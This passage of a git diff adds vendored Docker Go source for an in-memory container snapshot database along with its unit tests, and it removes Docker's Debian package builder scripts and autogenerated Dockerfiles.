"github.com/hashicorp/go-memdb" + 
"github.com/sirupsen/logrus" +) + +const ( + memdbContainersTable = "containers" + memdbNamesTable = "names" + memdbIDIndex = "id" + memdbContainerIDIndex = "containerid" +) + +var ( + // ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved + ErrNameReserved = errors.New("name is reserved") + // ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved + ErrNameNotReserved = errors.New("name is not reserved") +) + +// Snapshot is a read only view for Containers. It holds all information necessary to serve container queries in a +// versioned ACID in-memory store. +type Snapshot struct { + types.Container + + // additional info queries need to filter on + // preserve nanosec resolution for queries + CreatedAt time.Time + StartedAt time.Time + Name string + Pid int + ExitCode int + Running bool + Paused bool + Managed bool + ExposedPorts nat.PortSet + PortBindings nat.PortSet + Health string + HostConfig struct { + Isolation string + } +} + +// nameAssociation associates a container id with a name. +type nameAssociation struct { + // name is the name to associate. Note that name is the primary key + // ("id" in memdb). 
+ name string + containerID string +} + +// ViewDB provides an in-memory transactional (ACID) container Store +type ViewDB interface { + Snapshot() View + Save(*Container) error + Delete(*Container) error + + ReserveName(name, containerID string) error + ReleaseName(name string) error +} + +// View can be used by readers to avoid locking +type View interface { + All() ([]Snapshot, error) + Get(id string) (*Snapshot, error) + + GetID(name string) (string, error) + GetAllNames() map[string][]string +} + +var schema = &memdb.DBSchema{ + Tables: map[string]*memdb.TableSchema{ + memdbContainersTable: { + Name: memdbContainersTable, + Indexes: map[string]*memdb.IndexSchema{ + memdbIDIndex: { + Name: memdbIDIndex, + Unique: true, + Indexer: &containerByIDIndexer{}, + }, + }, + }, + memdbNamesTable: { + Name: memdbNamesTable, + Indexes: map[string]*memdb.IndexSchema{ + // Used for names, because "id" is the primary key in memdb. + memdbIDIndex: { + Name: memdbIDIndex, + Unique: true, + Indexer: &namesByNameIndexer{}, + }, + memdbContainerIDIndex: { + Name: memdbContainerIDIndex, + Indexer: &namesByContainerIDIndexer{}, + }, + }, + }, + }, +} + +type memDB struct { + store *memdb.MemDB +} + +// NoSuchContainerError indicates that the container wasn't found in the +// database. +type NoSuchContainerError struct { + id string +} + +// Error satisfies the error interface. 
+func (e NoSuchContainerError) Error() string { + return "no such container " + e.id +} + +// NewViewDB provides the default implementation, with the default schema +func NewViewDB() (ViewDB, error) { + store, err := memdb.NewMemDB(schema) + if err != nil { + return nil, err + } + return &memDB{store: store}, nil +} + +// Snapshot provides a consistent read-only View of the database +func (db *memDB) Snapshot() View { + return &memdbView{ + txn: db.store.Txn(false), + } +} + +func (db *memDB) withTxn(cb func(*memdb.Txn) error) error { + txn := db.store.Txn(true) + err := cb(txn) + if err != nil { + txn.Abort() + return err + } + txn.Commit() + return nil +} + +// Save atomically updates the in-memory store state for a Container. +// Only read only (deep) copies of containers may be passed in. +func (db *memDB) Save(c *Container) error { + return db.withTxn(func(txn *memdb.Txn) error { + return txn.Insert(memdbContainersTable, c) + }) +} + +// Delete removes an item by ID +func (db *memDB) Delete(c *Container) error { + return db.withTxn(func(txn *memdb.Txn) error { + view := &memdbView{txn: txn} + names := view.getNames(c.ID) + + for _, name := range names { + txn.Delete(memdbNamesTable, nameAssociation{name: name}) + } + + // Ignore error - the container may not actually exist in the + // db, but we still need to clean up associated names. 
+ txn.Delete(memdbContainersTable, NewBaseContainer(c.ID, c.Root)) + return nil + }) +} + +// ReserveName registers a container ID to a name +// ReserveName is idempotent +// Attempting to reserve a container ID to a name that already exists results in an `ErrNameReserved` +// A name reservation is globally unique +func (db *memDB) ReserveName(name, containerID string) error { + return db.withTxn(func(txn *memdb.Txn) error { + s, err := txn.First(memdbNamesTable, memdbIDIndex, name) + if err != nil { + return err + } + if s != nil { + if s.(nameAssociation).containerID != containerID { + return ErrNameReserved + } + return nil + } + return txn.Insert(memdbNamesTable, nameAssociation{name: name, containerID: containerID}) + }) +} + +// ReleaseName releases the reserved name +// Once released, a name can be reserved again +func (db *memDB) ReleaseName(name string) error { + return db.withTxn(func(txn *memdb.Txn) error { + return txn.Delete(memdbNamesTable, nameAssociation{name: name}) + }) +} + +type memdbView struct { + txn *memdb.Txn +} + +// All returns a all items in this snapshot. Returned objects must never be modified. +func (v *memdbView) All() ([]Snapshot, error) { + var all []Snapshot + iter, err := v.txn.Get(memdbContainersTable, memdbIDIndex) + if err != nil { + return nil, err + } + for { + item := iter.Next() + if item == nil { + break + } + snapshot := v.transform(item.(*Container)) + all = append(all, *snapshot) + } + return all, nil +} + +// Get returns an item by id. Returned objects must never be modified. +func (v *memdbView) Get(id string) (*Snapshot, error) { + s, err := v.txn.First(memdbContainersTable, memdbIDIndex, id) + if err != nil { + return nil, err + } + if s == nil { + return nil, NoSuchContainerError{id: id} + } + return v.transform(s.(*Container)), nil +} + +// getNames lists all the reserved names for the given container ID. 
+func (v *memdbView) getNames(containerID string) []string { + iter, err := v.txn.Get(memdbNamesTable, memdbContainerIDIndex, containerID) + if err != nil { + return nil + } + + var names []string + for { + item := iter.Next() + if item == nil { + break + } + names = append(names, item.(nameAssociation).name) + } + + return names +} + +// GetID returns the container ID that the passed in name is reserved to. +func (v *memdbView) GetID(name string) (string, error) { + s, err := v.txn.First(memdbNamesTable, memdbIDIndex, name) + if err != nil { + return "", err + } + if s == nil { + return "", ErrNameNotReserved + } + return s.(nameAssociation).containerID, nil +} + +// GetAllNames returns all registered names. +func (v *memdbView) GetAllNames() map[string][]string { + iter, err := v.txn.Get(memdbNamesTable, memdbContainerIDIndex) + if err != nil { + return nil + } + + out := make(map[string][]string) + for { + item := iter.Next() + if item == nil { + break + } + assoc := item.(nameAssociation) + out[assoc.containerID] = append(out[assoc.containerID], assoc.name) + } + + return out +} + +// transform maps a (deep) copied Container object to what queries need. +// A lock on the Container is not held because these are immutable deep copies. 
+func (v *memdbView) transform(container *Container) *Snapshot { + health := types.NoHealthcheck + if container.Health != nil { + health = container.Health.Status() + } + snapshot := &Snapshot{ + Container: types.Container{ + ID: container.ID, + Names: v.getNames(container.ID), + ImageID: container.ImageID.String(), + Ports: []types.Port{}, + Mounts: container.GetMountPoints(), + State: container.State.StateString(), + Status: container.State.String(), + Created: container.Created.Unix(), + }, + CreatedAt: container.Created, + StartedAt: container.StartedAt, + Name: container.Name, + Pid: container.Pid, + Managed: container.Managed, + ExposedPorts: make(nat.PortSet), + PortBindings: make(nat.PortSet), + Health: health, + Running: container.Running, + Paused: container.Paused, + ExitCode: container.ExitCode(), + } + + if snapshot.Names == nil { + // Dead containers will often have no name, so make sure the response isn't null + snapshot.Names = []string{} + } + + if container.HostConfig != nil { + snapshot.Container.HostConfig.NetworkMode = string(container.HostConfig.NetworkMode) + snapshot.HostConfig.Isolation = string(container.HostConfig.Isolation) + for binding := range container.HostConfig.PortBindings { + snapshot.PortBindings[binding] = struct{}{} + } + } + + if container.Config != nil { + snapshot.Image = container.Config.Image + snapshot.Labels = container.Config.Labels + for exposed := range container.Config.ExposedPorts { + snapshot.ExposedPorts[exposed] = struct{}{} + } + } + + if len(container.Args) > 0 { + var args []string + for _, arg := range container.Args { + if strings.Contains(arg, " ") { + args = append(args, fmt.Sprintf("'%s'", arg)) + } else { + args = append(args, arg) + } + } + argsAsString := strings.Join(args, " ") + snapshot.Command = fmt.Sprintf("%s %s", container.Path, argsAsString) + } else { + snapshot.Command = container.Path + } + + snapshot.Ports = []types.Port{} + networks := make(map[string]*network.EndpointSettings) + if 
container.NetworkSettings != nil { + for name, netw := range container.NetworkSettings.Networks { + if netw == nil || netw.EndpointSettings == nil { + continue + } + networks[name] = &network.EndpointSettings{ + EndpointID: netw.EndpointID, + Gateway: netw.Gateway, + IPAddress: netw.IPAddress, + IPPrefixLen: netw.IPPrefixLen, + IPv6Gateway: netw.IPv6Gateway, + GlobalIPv6Address: netw.GlobalIPv6Address, + GlobalIPv6PrefixLen: netw.GlobalIPv6PrefixLen, + MacAddress: netw.MacAddress, + NetworkID: netw.NetworkID, + } + if netw.IPAMConfig != nil { + networks[name].IPAMConfig = &network.EndpointIPAMConfig{ + IPv4Address: netw.IPAMConfig.IPv4Address, + IPv6Address: netw.IPAMConfig.IPv6Address, + } + } + } + for port, bindings := range container.NetworkSettings.Ports { + p, err := nat.ParsePort(port.Port()) + if err != nil { + logrus.Warnf("invalid port map %+v", err) + continue + } + if len(bindings) == 0 { + snapshot.Ports = append(snapshot.Ports, types.Port{ + PrivatePort: uint16(p), + Type: port.Proto(), + }) + continue + } + for _, binding := range bindings { + h, err := nat.ParsePort(binding.HostPort) + if err != nil { + logrus.Warnf("invalid host port map %+v", err) + continue + } + snapshot.Ports = append(snapshot.Ports, types.Port{ + PrivatePort: uint16(p), + PublicPort: uint16(h), + Type: port.Proto(), + IP: binding.HostIP, + }) + } + } + } + snapshot.NetworkSettings = &types.SummaryNetworkSettings{Networks: networks} + + return snapshot +} + +// containerByIDIndexer is used to extract the ID field from Container types. +// memdb.StringFieldIndex can not be used since ID is a field from an embedded struct. 
+type containerByIDIndexer struct{} + +// FromObject implements the memdb.SingleIndexer interface for Container objects +func (e *containerByIDIndexer) FromObject(obj interface{}) (bool, []byte, error) { + c, ok := obj.(*Container) + if !ok { + return false, nil, fmt.Errorf("%T is not a Container", obj) + } + // Add the null character as a terminator + v := c.ID + "\x00" + return true, []byte(v), nil +} + +// FromArgs implements the memdb.Indexer interface +func (e *containerByIDIndexer) FromArgs(args ...interface{}) ([]byte, error) { + if len(args) != 1 { + return nil, fmt.Errorf("must provide only a single argument") + } + arg, ok := args[0].(string) + if !ok { + return nil, fmt.Errorf("argument must be a string: %#v", args[0]) + } + // Add the null character as a terminator + arg += "\x00" + return []byte(arg), nil +} + +// namesByNameIndexer is used to index container name associations by name. +type namesByNameIndexer struct{} + +func (e *namesByNameIndexer) FromObject(obj interface{}) (bool, []byte, error) { + n, ok := obj.(nameAssociation) + if !ok { + return false, nil, fmt.Errorf(`%T does not have type "nameAssociation"`, obj) + } + + // Add the null character as a terminator + return true, []byte(n.name + "\x00"), nil +} + +func (e *namesByNameIndexer) FromArgs(args ...interface{}) ([]byte, error) { + if len(args) != 1 { + return nil, fmt.Errorf("must provide only a single argument") + } + arg, ok := args[0].(string) + if !ok { + return nil, fmt.Errorf("argument must be a string: %#v", args[0]) + } + // Add the null character as a terminator + arg += "\x00" + return []byte(arg), nil +} + +// namesByContainerIDIndexer is used to index container names by container ID. 
+type namesByContainerIDIndexer struct{} + +func (e *namesByContainerIDIndexer) FromObject(obj interface{}) (bool, []byte, error) { + n, ok := obj.(nameAssociation) + if !ok { + return false, nil, fmt.Errorf(`%T does not have type "nameAssocation"`, obj) + } + + // Add the null character as a terminator + return true, []byte(n.containerID + "\x00"), nil +} + +func (e *namesByContainerIDIndexer) FromArgs(args ...interface{}) ([]byte, error) { + if len(args) != 1 { + return nil, fmt.Errorf("must provide only a single argument") + } + arg, ok := args[0].(string) + if !ok { + return nil, fmt.Errorf("argument must be a string: %#v", args[0]) + } + // Add the null character as a terminator + arg += "\x00" + return []byte(arg), nil +} diff --git a/vendor/github.com/docker/docker/container/view_test.go b/vendor/github.com/docker/docker/container/view_test.go new file mode 100644 index 0000000000..434b7c618d --- /dev/null +++ b/vendor/github.com/docker/docker/container/view_test.go @@ -0,0 +1,186 @@ +package container // import "github.com/docker/docker/container" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/pborman/uuid" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +var root string + +func TestMain(m *testing.M) { + var err error + root, err = ioutil.TempDir("", "docker-container-test-") + if err != nil { + panic(err) + } + defer os.RemoveAll(root) + + os.Exit(m.Run()) +} + +func newContainer(t *testing.T) *Container { + var ( + id = uuid.New() + cRoot = filepath.Join(root, id) + ) + if err := os.MkdirAll(cRoot, 0755); err != nil { + t.Fatal(err) + } + c := NewBaseContainer(id, cRoot) + c.HostConfig = &containertypes.HostConfig{} + return c +} + +func TestViewSaveDelete(t *testing.T) { + db, err := NewViewDB() + if err != nil { + t.Fatal(err) + } + c := newContainer(t) + if err := c.CheckpointTo(db); err != nil { + 
t.Fatal(err) + } + if err := db.Delete(c); err != nil { + t.Fatal(err) + } +} + +func TestViewAll(t *testing.T) { + var ( + db, _ = NewViewDB() + one = newContainer(t) + two = newContainer(t) + ) + one.Pid = 10 + if err := one.CheckpointTo(db); err != nil { + t.Fatal(err) + } + two.Pid = 20 + if err := two.CheckpointTo(db); err != nil { + t.Fatal(err) + } + + all, err := db.Snapshot().All() + if err != nil { + t.Fatal(err) + } + if l := len(all); l != 2 { + t.Fatalf("expected 2 items, got %d", l) + } + byID := make(map[string]Snapshot) + for i := range all { + byID[all[i].ID] = all[i] + } + if s, ok := byID[one.ID]; !ok || s.Pid != 10 { + t.Fatalf("expected something different with for id=%s: %v", one.ID, s) + } + if s, ok := byID[two.ID]; !ok || s.Pid != 20 { + t.Fatalf("expected something different with for id=%s: %v", two.ID, s) + } +} + +func TestViewGet(t *testing.T) { + var ( + db, _ = NewViewDB() + one = newContainer(t) + ) + one.ImageID = "some-image-123" + if err := one.CheckpointTo(db); err != nil { + t.Fatal(err) + } + s, err := db.Snapshot().Get(one.ID) + if err != nil { + t.Fatal(err) + } + if s == nil || s.ImageID != "some-image-123" { + t.Fatalf("expected ImageID=some-image-123. Got: %v", s) + } +} + +func TestNames(t *testing.T) { + db, err := NewViewDB() + if err != nil { + t.Fatal(err) + } + assert.Check(t, db.ReserveName("name1", "containerid1")) + assert.Check(t, db.ReserveName("name1", "containerid1")) // idempotent + assert.Check(t, db.ReserveName("name2", "containerid2")) + assert.Check(t, is.Error(db.ReserveName("name2", "containerid3"), ErrNameReserved.Error())) + + // Releasing a name allows the name to point to something else later. 
+ assert.Check(t, db.ReleaseName("name2")) + assert.Check(t, db.ReserveName("name2", "containerid3")) + + view := db.Snapshot() + + id, err := view.GetID("name1") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid1", id)) + + id, err = view.GetID("name2") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid3", id)) + + _, err = view.GetID("notreserved") + assert.Check(t, is.Error(err, ErrNameNotReserved.Error())) + + // Releasing and re-reserving a name doesn't affect the snapshot. + assert.Check(t, db.ReleaseName("name2")) + assert.Check(t, db.ReserveName("name2", "containerid4")) + + id, err = view.GetID("name1") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid1", id)) + + id, err = view.GetID("name2") + assert.Check(t, err) + assert.Check(t, is.Equal("containerid3", id)) + + // GetAllNames + assert.Check(t, is.DeepEqual(map[string][]string{"containerid1": {"name1"}, "containerid3": {"name2"}}, view.GetAllNames())) + + assert.Check(t, db.ReserveName("name3", "containerid1")) + assert.Check(t, db.ReserveName("name4", "containerid1")) + + view = db.Snapshot() + assert.Check(t, is.DeepEqual(map[string][]string{"containerid1": {"name1", "name3", "name4"}, "containerid4": {"name2"}}, view.GetAllNames())) + + // Release containerid1's names with Delete even though no container exists + assert.Check(t, db.Delete(&Container{ID: "containerid1"})) + + // Reusing one of those names should work + assert.Check(t, db.ReserveName("name1", "containerid4")) + view = db.Snapshot() + assert.Check(t, is.DeepEqual(map[string][]string{"containerid4": {"name1", "name2"}}, view.GetAllNames())) +} + +// Test case for GitHub issue 35920 +func TestViewWithHealthCheck(t *testing.T) { + var ( + db, _ = NewViewDB() + one = newContainer(t) + ) + one.Health = &Health{ + Health: types.Health{ + Status: "starting", + }, + } + if err := one.CheckpointTo(db); err != nil { + t.Fatal(err) + } + s, err := db.Snapshot().Get(one.ID) + if err != nil { + t.Fatal(err) + 
} + if s == nil || s.Health != "starting" { + t.Fatalf("expected Health=starting. Got: %+v", s) + } +} diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh deleted file mode 100755 index 8271d9dc47..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh deleted file mode 100755 index b5040b709a..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh +++ /dev/null @@ -1,118 +0,0 @@ -#!/bin/bash -set -e - -# This file is used to auto-generate Dockerfiles for making debs via 'make deb' -# -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh ubuntu-trusty -# to only update ubuntu-trusty/Dockerfile -# or: ./generate.sh ubuntu-newversion -# to create a new folder and a Dockerfile within it -# -# Note: non-LTS versions are not guaranteed to work. - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - echo "${versions[@]}" - distro="${version%-*}" - suite="${version##*-}" - from="aarch64/${distro}:${suite}" - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! 
- # - - FROM $from - - EOF - - dockerBuildTags='apparmor pkcs11 selinux' - runcBuildTags='apparmor selinux' - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - - case "$suite" in - trusty) - packages+=( libsystemd-journal-dev ) - # aarch64 doesn't have an official downloadable binary for go. - # And gccgo for trusty only includes Go 1.2 implementation which - # is too old to build current go source, fortunately trusty has - # golang-1.6-go package can be used as bootstrap. 
- packages+=( golang-1.6-go ) - ;; - xenial) - packages+=( libsystemd-dev ) - packages+=( golang-go libseccomp-dev) - - dockerBuildTags="$dockerBuildTags seccomp" - runcBuildTags="$runcBuildTags seccomp" - ;; - *) - echo "Unsupported distro:" $distro:$suite - rm -fr "$version" - exit 1 - ;; - esac - - # update and install packages - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - case "$suite" in - trusty) - echo 'RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - ;; - *) - ;; - esac - - echo "# Install Go" >> "$version/Dockerfile" - echo "# aarch64 doesn't have official go binaries, so use the version of go installed from" >> "$version/Dockerfile" - echo "# the image to build go from source." >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.aarch64 >> "$version/Dockerfile" - echo 'RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \' >> "$version/Dockerfile" - echo ' && cd /usr/src/go/src \' >> "$version/Dockerfile" - echo ' && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo 'ENV PATH $PATH:/usr/src/go/bin' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo "ENV AUTO_GOPATH 1" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo "ENV DOCKER_BUILDTAGS $dockerBuildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile deleted file mode 100644 index 
d04860ccd7..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,24 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! -# - -FROM aarch64/ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev golang-1.6-go --no-install-recommends && rm -rf /var/lib/apt/lists/* - -RUN update-alternatives --install /usr/bin/go go /usr/lib/go-1.6/bin/go 100 - -# Install Go -# aarch64 doesn't have official go binaries, so use the version of go installed from -# the image to build go from source. -ENV GO_VERSION 1.7.5 -RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ - && cd /usr/src/go/src \ - && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash - -ENV PATH $PATH:/usr/src/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile deleted file mode 100644 index 3cd8442eca..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/aarch64/generate.sh"! 
-# - -FROM aarch64/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-dev golang-go libseccomp-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -# Install Go -# aarch64 doesn't have official go binaries, so use the version of go installed from -# the image to build go from source. -ENV GO_VERSION 1.7.5 -RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ - && cd /usr/src/go/src \ - && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash - -ENV PATH $PATH:/usr/src/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux seccomp -ENV RUNC_BUILDTAGS apparmor selinux seccomp diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md deleted file mode 100644 index 20a0ff1006..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md +++ /dev/null @@ -1,5 +0,0 @@ -# `dockercore/builder-deb` - -This image's tags contain the dependencies for building Docker `.deb`s for each of the Debian-based platforms Docker targets. - -To add new tags, see [`contrib/builder/deb/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/deb/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. 
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh deleted file mode 100755 index 8271d9dc47..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile deleted file mode 100644 index 42aaa56c01..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile +++ /dev/null @@ -1,20 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM debian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile deleted file mode 100644 index c052be56ce..0000000000 --- 
a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile +++ /dev/null @@ -1,20 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM debian:stretch - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile deleted file mode 100644 index bcedb47b94..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
-# - -FROM debian:wheezy-backports - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list - -RUN apt-get update && apt-get install -y -t wheezy-backports btrfs-tools --no-install-recommends && rm -rf /var/lib/apt/lists/* -RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh deleted file mode 100755 index 765db5d8e9..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh +++ /dev/null @@ -1,149 +0,0 @@ -#!/bin/bash -set -e - -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh debian-jessie -# to only update debian-jessie/Dockerfile -# or: ./generate.sh debian-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - distro="${version%-*}" - suite="${version##*-}" - from="${distro}:${suite}" - - case "$from" in - debian:wheezy) - # add -backports, like our users have to - from+='-backports' - ;; - esac - - mkdir -p "$version" - echo 
